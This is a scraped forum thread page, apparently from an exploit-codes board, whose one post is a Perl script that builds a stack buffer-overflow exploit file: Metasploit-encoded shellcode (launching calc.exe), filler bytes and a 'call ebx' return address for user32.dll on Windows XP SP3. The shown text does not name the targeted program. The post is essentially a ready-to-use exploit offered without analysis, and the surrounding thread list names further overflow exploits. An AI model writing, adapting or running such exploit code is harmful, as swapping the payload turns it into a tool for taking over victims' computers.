![]() |
|
|
|||||||
| Notices |

Register Now for FREE!
|
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#1 (permalink) |
|
Studentz
![]() |
#!/usr/bin/perl
# k`sOSe - 07/29/2008 use warnings; use strict; # The Metasploit Project # EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe #[*] x86/shikata_ga_nai succeeded, final size 169 my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\ x31\xc9\xb1" . "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\ xd1\x13\x93" . "\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\ x2c\x91\x68" . "\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\ xd2\x47\x6b" . "\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\ xac\x63\xeb" . "\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\ x82\x23\x2d" . "\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\ x67\x4e\xa5" . "\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\ x0f\x8f\x9e" . "\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\ x3d\xa5\x11" . "\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\ x23\x4e\xa4" . "\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\ x8a\x3b\x1c" . "\x1e\x28\x44\xd4"; print $shellcode . "\x41" x (218 - length($shellcode)) . "\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3
__________________
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. |
|
|
|
![]() |
| Bookmarks |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow | Armageddon | Exploit Codes | 0 | 08-08-2008 01:07 PM |
| IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Explo | Armageddon | Exploit Codes | 0 | 08-02-2008 12:08 PM |
| Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c) | Armageddon | Exploit Codes | 0 | 07-31-2008 08:54 PM |
| Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow | Wh!5t|eR | Exploit Codes | 0 | 07-15-2008 04:36 AM |
| Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit | The Boss | Exploit Codes | 0 | 04-24-2008 02:23 AM |